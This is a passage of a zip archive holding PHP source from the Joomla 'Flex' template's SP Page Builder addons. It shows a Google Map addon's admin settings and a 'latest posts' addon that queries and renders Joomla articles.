				<div id="sppb-addon-gmap-{{ data.id }}" class="sppb-addon-gmap-canvas" data-lat="{{ map[0] }}" data-lng="{{ map[1] }}" data-tmpl_url="{{ data.tmpl_url }}" data-maptype="{{ data.type }}" data-mapzoom="{{ data.zoom }}" data-mousescroll="{{ data.mousescroll }}" data-water_color="{{ data.water_color }}" data-highway_stroke_color="{{ data.highway_stroke_color }}" data-highway_fill_color="{{ data.highway_fill_color }}" data-local_stroke_color="{{ data.local_stroke_color }}" data-local_fill_color="{{ data.local_fill_color }}" data-poi_fill_color="{{ data.poi_fill_color }}" data-administrative_color="{{ data.administrative_color }}" data-landscape_color="{{ data.landscape_color }}" data-road_text_color="{{ data.road_text_color }}" data-road_arterial_fill_color="{{ data.road_arterial_fill_color }}" data-road_arterial_stroke_color="{{ data.road_arterial_stroke_color }}" data-show_transit="{{ transitShow }}" data-show_poi="{{ poiShow }}" data-infowindow="{{ btoa(data.infowindow) }}"></div>
			</div>
		</div>
		';

		return $output;
	}
}
PK!뽟bh/h/(flex/sppagebuilder/addons/gmap/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2019 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined ('_JEXEC') or die ('Restricted access');

$params = JComponentHelper::getParams('com_sppagebuilder');
$gmap_api = $params->get('gmap_api', '');

$gmap_config = array(
	'admin_label'=>array(
		'type'=>'text',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
		'category'=>'General',
		'std'=> ''
	),

	// Title
	'title'=>array(
		'type'=>'text',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
		'std'=>  ''
	),

	'heading_selector'=>array(
		'type'=>'select',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
		'values'=>array(
			'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
			'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
			'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
			'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
			'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
			'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
		),
		'std'=>'h3',
		'depends'=>array(array('title', '!=', '')),
	),

	'title_font_family'=>array(
		'type'=>'fonts',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_FAMILY_DESC'),
		'depends'=>array(array('title', '!=', '')),
		'selector'=> array(
			'type'=>'font',
			'font'=>'{{ VALUE }}',
			'css'=>'.sppb-addon-title { font-family: "{{ VALUE }}"; }'
		)
	),

	'title_fontsize'=>array(
		'type'=>'slider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
		'std'=>'',
		'max'=>400,
		'responsive'=>true,
		'depends'=>array(array('title', '!=', '')),
	),

	'title_lineheight'=>array(
		'type'=>'slider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_LINE_HEIGHT'),
		'std'=>'',
		'max'=>400,
		'responsive'=>true,
		'depends'=>array(array('title', '!=', '')),
	),

	'title_font_style'=>array(
		'type'=>'fontstyle',
		'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_STYLE'),
		'depends'=>array(array('title', '!=', '')),
	),

	'title_letterspace'=>array(
		'type'=>'select',
		'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_LETTER_SPACING'),
		'values'=>array(
			'0'=> 'Default',
			'1px'=> '1px',
			'2px'=> '2px',
			'3px'=> '3px',
			'4px'=> '4px',
			'5px'=> '5px',
			'6px'=>	'6px',
			'7px'=>	'7px',
			'8px'=>	'8px',
			'9px'=>	'9px',
			'10px'=> '10px'
		),
		'std'=>'0',
		'depends'=>array(array('title', '!=', '')),
	),

	'title_text_color'=>array(
		'type'=>'color',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
		'depends'=>array(array('title', '!=', '')),
	),

	'title_margin_top'=>array(
		'type'=>'slider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
		'placeholder'=>'10',
		'max'=>400,
		'responsive'=>true,
		'depends'=>array(array('title', '!=', '')),
	),

	'title_margin_bottom'=>array(
		'type'=>'slider',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
		'placeholder'=>'10',
		'max'=>400,
		'responsive'=>true,
		'depends'=>array(array('title', '!=', '')),
	),

	// Map
	
	'separator_addon_options'=>array(
		'type'=>'separator',
		'title'=>JText::_('COM_SPPAGEBUILDER_GLOBAL_ADDON_OPTIONS')
	),
	
	'api_key'=>array(
		'type'=>'text', 
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY_DESC'),
		'placeholder'=>JText::_('COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY_PLACEHOLDER'),
		'std'=> ''
	)

);

if (empty($gmap_api)) {
	$gmap_config['message'] = array(
		'type'=>'message',
		'alert' => 'warning',
		'message' => JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_APIKEY_MISSING'),
	);
}

$gmap_config['map'] = array(
	'type'=>'gmap',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCATION'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCATION_DESC'),
	'std' => '40.736883,-73.818794'
	
);

$gmap_config['infowindow'] = array(
	'type'=>'textarea',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_INFOWINDOW'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_INFOWINDOW_DESC'),
);
/*
$gmap_config['multi_location'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_MULTI_LOCATION'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_MULTI_LOCATION_DESC'),
	'values'=>array(
		1=> JText::_('YES'),
		0=> JText::_('NO'),
	),
	'std'=> 0
);
$gmap_config['multi_location_items'] = array(
	'title'=> JText::_('COM_SPPAGEBUILDER_ADDON_MULTI_LOCATION_ITEMS'),
	'attr'=> array(
		'location_item'=>array(
			'type'=>'gmap',
			'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCATION'),
			'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCATION_DESC'),
			'std'=>'22.3435442,91.765449',
		),
		'location_popup_text' => array(
			'type'=>'textarea',
			'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_INFOWINDOW'),
			'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_INFOWINDOW_DESC'),
			'std'=>'Chittagong',
		),
	),
	'depends'=> array(
		array('multi_location', '!=', 0),
	)
);
*/
$gmap_config['height'] = array(
	'type'=>'slider',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HEIGHT'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HEIGHT_DESC'),
	'placeholder'=>'300',
	'std'=>array('md'=>300),
	'max'=>2000,
	'responsive'=>true,
	'depends'=>array(array('map', '!=', '')),
);

$gmap_config['type'] = array(
	'type'=>'select',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE_DESC'),
	'values'=>array(
		'ROADMAP'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE_ROADMAP'),
		'SATELLITE'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE_SATELLITE'),
		'HYBRID'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE_HYBRID'),
		'TERRAIN'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_TYPE_TERRAIN'),
	),
	'std'=>'ROADMAP',
	'depends'=>array(array('map', '!=', '')),
);
$gmap_config['zoom'] = array(
	'type'=>'slider',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ZOOM'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ZOOM_DESC'),
	'placeholder'=>'17',
	'std'=>'17',
	'max'=>25,
	'depends'=>array(array('map', '!=', '')),
);
$gmap_config['mousescroll'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_DISABLE_MOUSE_SCROLL'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_DISABLE_MOUSE_SCROLL_DESC'),
	'values'=>array(
		'false'=>JText::_('JYES'),
		'true'=>JText::_('JNO'),
	),
	'std'=>'true',
	'depends'=>array(array('map', '!=', '')),
);

// UPDATE for FLEX
$gmap_config['street_view_control'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_STREET_VIEW_CONTROL'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_STREET_VIEW_CONTROL_DESC'),
	'values'=>array(
		'false'=>JText::_('JYES'),
		'true'=>JText::_('JNO'),
	),
	'std'=>'false',
	'depends'=>array(array('map', '!=', '')),
);

$gmap_config['map_type_control'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_MAP_TYPE_CONTROL'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_MAP_TYPE_CONTROL_DESC'),
	'values'=>array(
		'false'=>JText::_('JYES'),
		'true'=>JText::_('JNO'),
	),
	'std'=>'false',
	'depends'=>array(array('map', '!=', '')),
);

$gmap_config['fullscreen_control'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_FULLSCREEN_CONTROL'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_FULLSCREEN_CONTROL_DESC'),
	'values'=>array(
		'false'=>JText::_('JYES'),
		'true'=>JText::_('JNO'),
	),
	'std'=>'false',
	'depends'=>array(array('map', '!=', '')),
);

$gmap_config['show_transit'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('FLEX_GMAP_SHOW_TRANSIT'),
	'desc'=>JText::_('FLEX_GMAP_SHOW_TRANSIT_DESC'),
	'values'=>array(
		1=>JText::_('JYES'),
		0=>JText::_('JNO'),
	),
	'std'=>0,
	'depends'=>array(array('map', '!=', '')),
);

$gmap_config['show_poi'] = array(
	'type'=>'checkbox',
	'title'=>JText::_('FLEX_GMAP_SHOW_POI'),
	'desc'=>JText::_('FLEX_GMAP_SHOW_POI_DESC'),
	'values'=>array(
		1=>JText::_('JYES'),
		0=>JText::_('JNO'),
	),
	'std'=>0,
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['class'] = array(
	'type'=>'text',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_CLASS_DESC'),
	'std'=>''
);

// Separator
$gmap_config['separator2'] = array(
	'type'=>'separator',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_COLOR_SETTINGS'),				
);
$gmap_config['water_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_WATER_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_WATER_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['highway_stroke_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HW_STROKE_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HW_STROKE_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['highway_fill_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HW_FILL_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_HW_FILL_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);

$gmap_config['local_stroke_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_STROKE_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_STROKE_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['local_fill_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_FILL_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_FILL_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);

$gmap_config['poi_fill_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_POI_FILL_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_POI_FILL_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['administrative_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ADMINISTRATIVE_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ADMINISTRATIVE_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['landscape_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LANDSCAPE_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_LANDSCAPE_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['road_text_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_TEXT_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_TEXT_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['road_arterial_fill_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_FILL_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_FILL_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);
$gmap_config['road_arterial_stroke_color'] = array(
	'type'=>'color',
	'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_STROKE_COLOR'),
	'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_STROKE_COLOR_DESC'),
	'std'=> '',
	'depends'=>array(array('map', '!=', '')),		
);

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_gmap',
		'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP'),
		'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_GMAP_DESC'),
		'attr'=>array(
			'general' => $gmap_config
		),
	)
);
PK!��~;~;/flex/sppagebuilder/addons/latest_posts/site.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2018 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

JLoader::register('JHtmlString', JPATH_LIBRARIES.'/joomla/html/html/string.php');

AddonParser::addAddon('sp_latest_posts','sp_latest_posts_addon');

function get_categories($parent=1) {
	$db = JFactory::getDbo();
	$query = $db->getQuery(true);

	$query
	->select('*')
	->from($db->quoteName('#__categories'))
	->where($db->quoteName('extension') . ' = ' . $db->quote('com_content'))
	->where($db->quoteName('published') . ' = ' . $db->quote(1))
	->where($db->quoteName('parent_id') . ' = ' . $db->quote($parent))
	->order($db->quoteName('created_time') . ' DESC');

	$db->setQuery($query);

	$cats = $db->loadObjectList();

	$categories = array($parent);

	foreach ($cats as $key => $cat) {
		$categories[] = $cat->id;
	}

	return $categories;
}

function sp_latest_posts_addon($atts){

	extract(spAddonAtts(array(
		"title" 				    => '',
		"heading_selector" 		=> 'h3',
		"title_fontsize" 		=> '',
		"title_text_color" 		=> '',
		"title_margin_top" 		=> '',
		"title_margin_bottom" 	=> '',
		"show_image"			=> '',
		"show_date"			    => '',
		"date_format"		    => '',
		"show_category"			=> '',
		"show_intro_text"		=> '',
		"show_readmore"	    	=> '',
		"readmore_button" 	    => '',
		"readmore_button_position" => '',
		"button_type" 	        => '',
		"button_appearance"     => '',
		"button_size" 	    	=> '',
		"button_shape" 	    	=> '',
		"button_block" 	    	=> '',
		"show_author"		    => '',
		"item_limit"			=> '',
		"intro_text_limit"		=> '100',
		"column_no"				=> '3',
		"image_alignment" 		=> '',
		"category"				=> '',
		"enable_masonry"		=> '0',
		"style" 		      		=> '',
		"class" 					=> '',
		), $atts));
	
	$doc = JFactory::getDocument();
	$app = JFactory::getApplication();
	
	// Database Query
	require_once JPATH_SITE . '/components/com_content/helpers/route.php';

	// Access filter
	$access     = !JComponentHelper::getParams('com_content')->get('show_noauth');
	$authorised = JAccess::getAuthorisedViewLevels(JFactory::getUser()->get('id'));

	$catid = '';
	
	$db = JFactory::getDbo();
	$query = $db->getQuery(true);
	$nullDate = $db->quote($db->getNullDate());
	$nowDate  = $db->quote(JFactory::getDate()->toSql());

	$query
	->select('a.*')
	->from($db->quoteName('#__content', 'a'))
	->select($db->quoteName('b.alias', 'category_alias'))
	->select($db->quoteName('b.title', 'category'))
	->join('LEFT', $db->quoteName('#__categories', 'b') . ' ON (' . $db->quoteName('a.catid') . ' = ' . $db->quoteName('b.id') . ')')
	->where($db->quoteName('b.extension') . ' = ' . $db->quote('com_content'))
	->where($db->quoteName('a.state') . ' = ' . $db->quote(1))
	->where($db->quoteName('a.catid')." IN (" . implode( ',', get_categories($category) ) . ")")
	->where($db->quoteName('a.access')." IN (" . implode( ',', $authorised ) . ")")	
	->order($db->quoteName('a.created') . ' DESC')
	->setLimit($item_limit);
	
	$query->where('(a.publish_up = ' . $nullDate . ' OR a.publish_up <= ' . $nowDate . ')');
	$query->where('(a.publish_down = ' . $nullDate . ' OR a.publish_down >= ' . $nowDate . ')');
	
	$db->setQuery($query);

	$items = $db->loadObjectList();
	
	// End Database Query
	$match_height = '';
	$masonry = '';
	if ($enable_masonry == '1' && $column_no > '1') {
		$masonry = ' masonry_item';
	}

	$style == 'flex' ? $flex_style = ' flex' : $flex_style = '';
	$style == 'blog' ? $blog_style = ' blog' : $blog_style = '';
	$readmore_button != '' ? $button_text = $readmore_button : $button_text = JText::_('READ_MORE_TITLE');
	$readmore_button_position == 'left' ? $readmore_button_position = ' pull-left' : $readmore_button_position = ' pull-right';
	
	$date_format != '' ? $date_format : 'DATE_FORMAT_LC1';
	
	// Readmore button
	$button_classes = (isset($button_size) && $button_size) ? ' sppb-btn-' . $button_size : '';
	$button_classes .= (isset($button_type) && $button_type) ? ' sppb-btn-' . $button_type : ' sppb-btn-default';
	$button_classes .= (isset($button_shape) && $button_shape) ? ' sppb-btn-' . $button_shape: ' sppb-btn-rounded';
	$button_classes .= (isset($button_appearance) && $button_appearance) ? ' sppb-btn-' . $button_appearance : '';
	$button_classes .= (isset($button_block) && $button_block) ? ' ' . $button_block : '';
	
	//random ID number to avoid conflict if there is more then one Slick carousel on the same page
	$randomid = rand(1,1000);

	$output  = '<div class="sppb-addon-latest-posts'. $flex_style . $blog_style .' row ' . $class . '">';

	if ($title) {
		$output .= '<div class="sppb-section-title">';
			$output .= '<'.$heading_selector.' class="sppb-addon-title" style="' . $title_style . '"> ' . $title . '</' . $heading_selector . '>';
		$output .= '</div>'; // END :: title
	}

	$output .= '<div class="sppb-addon-content">';
	$output .= '<div id="lp-'.$randomid.'" class="latest-posts clearfix">';

	foreach(array_chunk($items, $column_no) as $items) {
		$output .= '<div>';
		foreach ($items as $item) {

			$item->slug    = $item->id . ':' . $item->alias;
			$item->catslug = $item->catid . ':' . $item->category_alias;
			$item->user    = JFactory::getUser($item->created_by)->name;


			if ($access || in_array($item->access, $authorised)) {
				// We know that user has the privilege to view the article
				$item->link = JRoute::_(ContentHelperRoute::getArticleRoute($item->slug, $item->catid, $item->language));
				$item->catlink = JRoute::_(ContentHelperRoute::getCategoryRoute($item->catslug, $item->catid, $item->language));
			} else {
				$item->link = JRoute::_('index.php?option=com_users&view=login');
				$item->catlink = JRoute::_('index.php?option=com_users&view=login');
			}
			
			$tplParams 		= JFactory::getApplication()->getTemplate(true)->params;
			//$params  		= $item->params;
			$attribs 		= json_decode($item->attribs);
			$images 			= json_decode($item->images);
			$imgsize 		= $tplParams->get('blog_list_image', 'default');
			$intro_image 	= '';

			if(isset($attribs->spfeatured_image) && $attribs->spfeatured_image != '') {
			
				if($imgsize == 'default') {
					$intro_image = $attribs->spfeatured_image;
				} else {
					$intro_image = $attribs->spfeatured_image;
					$basename = basename($intro_image);
					$list_image = JPATH_ROOT . '/' . dirname($intro_image) . '/' . JFile::stripExt($basename) . '_'. $imgsize .'.' . JFile::getExt($basename);
					if(file_exists($list_image)) {
						$intro_image = JURI::root(true) . '/' . dirname($intro_image) . '/' . JFile::stripExt($basename) . '_'. $imgsize .'.' . JFile::getExt($basename);
					}
				}
			} elseif(isset($images->image_intro) && !empty($images->image_intro)) {
				$intro_image = $images->image_intro;
			}
		
	
		if($column_no == '1') {
			if ($show_image) {
			$image_alignment == 'left' ? $img_column = 'col-sm-4 column-1 pull-left match-height' : $img_column = 'col-sm-4 column-1 pull-right match-height';
			}
			if ($show_image) {
				$image_alignment == 'right' ? $content_column = 'col-sm-8 column-1 pull-left match-height' : $content_column = 'col-sm-8 column-1 pull-right match-height';
			} else {		
				$image_alignment == 'right' ? $content_column = 'col-sm-12 column-1' : $content_column = 'col-sm-12 column-1';
			}
			$h2style = ' style="font-size:180%;line-height:1.4;"';
			$img_wrapper_margin = ' style="margin:0;"';
			
			if ($image_alignment == 'left') {
				$inner_padding = ' style="padding:0 0 0 30px;"';
			} else {
				$inner_padding = ' style="padding:0 30px 0 0;"';
			}
		} else {
			$h2style = '';
			$img_wrapper_margin = '';
		}
		
		if ($enable_masonry == '0') {
			// match-height
			$column_no > '1' ? $match_height = ' match-height' : $match_height = ' match-height';
		} else {
			$column_no == '1' ? $match_height = ' match-height' : $match_height = '';
		}
		
		// Flex Style
		if($style == 'flex') {
			$output .= '<div class="latest-post'.$masonry.' col-sm-' . round(12/$column_no) . ' columns-'.$column_no.'">';
			$output .= '<div class="latest-post-item'. $match_height .'">';
		
			if($column_no == '1') {
				$output .= '<div class="row-fluid">';
			}
			
			if(!empty($intro_image) || (isset($images->image_intro) && !empty($images->image_intro))) {
				if ($show_image) {
					
					if($column_no == '1') {
						$output .= '<div style="padding:0" class="'.$img_column.'">';
					}
					$output .= '<div class="img-wrapper">';
					$output .= '<a href="' . $item->link . '"><img class="post-img" src="' . $intro_image . '" alt="' . $item->title . '" /><div class="caption-content">' . $item->title;
					if ($show_category) {
						$output .= '<em class="caption-category"><span class="posted-in">'. JText::_('COM_SPPAGEBUILDER_ADDON_POSTED_IN') .'</span>'. $item->category . '</em>';
					}
					$output .= '</div></a>';
					$output .= '</div>';
					
					if($column_no == '1') {
						$output .= '</div>';
					}
				}
			}
				if($column_no == '1') {
					$output .= '<div'.$inner_padding.' class="'.$content_column.'">';
				}
				$output .= '<div class="latest-post-inner">';
				

				if (($show_date || $show_intro_text || $show_author) != 1)  {
				   $output .= '<h2 style="margin:0" class="entry-title"><a href="' . $item->link . '">' . $item->title . '</a></h2>';
				} else {
				   $output .= '<h2'.$h2style.' class="entry-title"><a href="' . $item->link . '">' . $item->title . '</a></h2>';
				}
				if ($show_date) {
					$output .= '<div class="entry-meta"><span class="entry-date">' . JHtml::_('date', $item->created, $date_format) . '</span></div>';
					
				}
				if ($show_intro_text) {
					if ($intro_text_limit != '') {
						$output .= '<p class="intro-text" >' . JHtml::_('string.truncate', strip_tags($item->introtext), $intro_text_limit) . '</p>';
					} else {
						$output .= '<p class="intro-text" >' . JHtml::_('string.truncate', $item->introtext, $intro_text_limit) . '</p>';
					}
				}
				
				$show_author || $show_category ? $output .= '<hr />' : $output .= '';
				if ($show_author) {	
					$output .= '<span class="post-author"><span class="entry-author">' . JText::_('COM_SPPAGEBUILDER_ADDON_POSTED_BY'). '</span> ' . $item->user . '</span>';
				}
				if ($show_category) {	
				    $show_author ? $posted_in_category = ' cat-inline' : $posted_in_category = '';
					$output .= '<span class="category'.$posted_in_category.'"><span class="posted-in">'. JText::_('COM_SPPAGEBUILDER_ADDON_CATEGORY') .'</span><a href="' . $item->catlink . '">'. $item->category . '</a></span>';
				}
				
				if($column_no == '1') {
					$output .= '</div>';
					$output .= '</div>';
				}
			//Readmore button
			if ($show_readmore == '1') {	
			    $output .= '<div class="clearfix" style="margin-top:25px;"><a class="sppb-btn' . $button_classes . ''.$readmore_button_position.'" href="' . $item->link . '">'. $button_text. '</a></div>';
				
			}
				
			$output .= '</div>';
			if($column_no == '1') {
				$output .= '<div class="post-divider"></div>';
			}
			$output .= '</div>';
		
		// Default & Blog styles	
		} else {
				
			$output .= '<div class="latest-post'.$masonry.' col-sm-' . round(12/$column_no) . ' columns-'.$column_no.'">';
			$output .= '<div class="latest-post-inner'. $match_height .'">';
				
			if($column_no == '1') {
				$output .= '<div class="row-fluid">';
			}
				if ($show_image) {
					if($column_no == '1') {
						$output .= '<div class="'.$img_column.'">';
					}
					$output .= '<div'.$img_wrapper_margin.' class="img-wrapper">';
					$output .= '<a href="' . $item->link . '"><img class="post-img" src="' . $intro_image . '" alt="' . $item->title . '" /></a>';
					$output .= '</div>';
					
					if($column_no == '1') {
						$output .= '</div>';
					}
				}
				
			if($column_no == '1') {
				$output .= '<div class="'.$content_column.'">';
			}
				if ($show_date) {
					$output .= '<div class="entry-meta"><span class="entry-date"> ' . JHtml::_('date', $item->created, $date_format) . '</span></div>';
				}
				$output .= '<h2'.$h2style.' class="entry-title"><a href="' . $item->link . '">' . $item->title . '</a></h2>';
				if ($show_intro_text) {
					if ($intro_text_limit != '') {
						$output .= '<p class="intro-text" >' . JHtml::_('string.truncate', strip_tags($item->introtext), $intro_text_limit) . '</p>';
					} else {
						$output .= '<p class="intro-text" >' . JHtml::_('string.truncate', $item->introtext, $intro_text_limit) . '</p>';
					}
				}
				$show_author || $show_category ? $output .= '<hr />' : '';
				if ($show_author) {	
					$output .= '<span class="post-author"><span class="entry-author">' . JText::_('COM_SPPAGEBUILDER_ADDON_POSTED_BY'). ' ' . $item->user . '</span></span>';
				}
				if ($show_category) {	
				$show_author ? $posted_in_category = ' cat-inline' : $posted_in_category = '';
					$output .= '<span class="category'.$posted_in_category.'"><span class="posted-in">'. JText::_('COM_SPPAGEBUILDER_ADDON_CATEGORY') .'</span><a href="' . $item->catlink . '">'. $item->category . '</a></span>';
				}
				if($column_no == '1') {
					$output .= '</div>';
					$output .= '</div>';
				}
				
				//Readmore button
				if ($show_readmore == '1') {	
					$output .= '<div class="clearfix" style="margin-top:25px;"><a class="sppb-btn' . $button_classes . ''.$readmore_button_position.'" href="' . $item->link . '">'. $button_text. '</a></div>';
				}
			
				$output .= '</div>';	
			}
			$output .= '</div>';
		}
		$output .= '</div>';
	}

	$output .= '</div>';
	$output .= '</div>';
	$output .= '</div>';
	
	
	$column_no == '1' ? $column_no_1 = '.column-1 {margin:10px auto;padding:0!important;}' : $column_no_1 = '';
	
	// Add styles @media rulepost-img
	if($style == 'flex') {
		$custom_style = ''
				. '@media screen and (max-width: 768px) {'
				. $column_no_1
				. '.img-wrapper a {font-size:150%;line-height:1.5;}'
				. '}';
		$doc->addStyleDeclaration($custom_style);
	}
	
	if ($column_no>='3') {
	$custom_style_3 = ''
			. '@media screen and (min-width: 992px) and (max-width: 1199px){'
			. '.columns-'.$column_no.'{width:33.3333%;}'
			. '}'
			. '@media screen and (min-width: 768px) and (max-width: 991px){'
			. '.columns-'.$column_no.'{width:50%}'
			. '}';
	$doc->addStyleDeclaration($custom_style_3);
	}
	if($column_no=='5') {
	$custom_style_5 = ''
			. '.columns-'.$column_no.' {width:20%}'
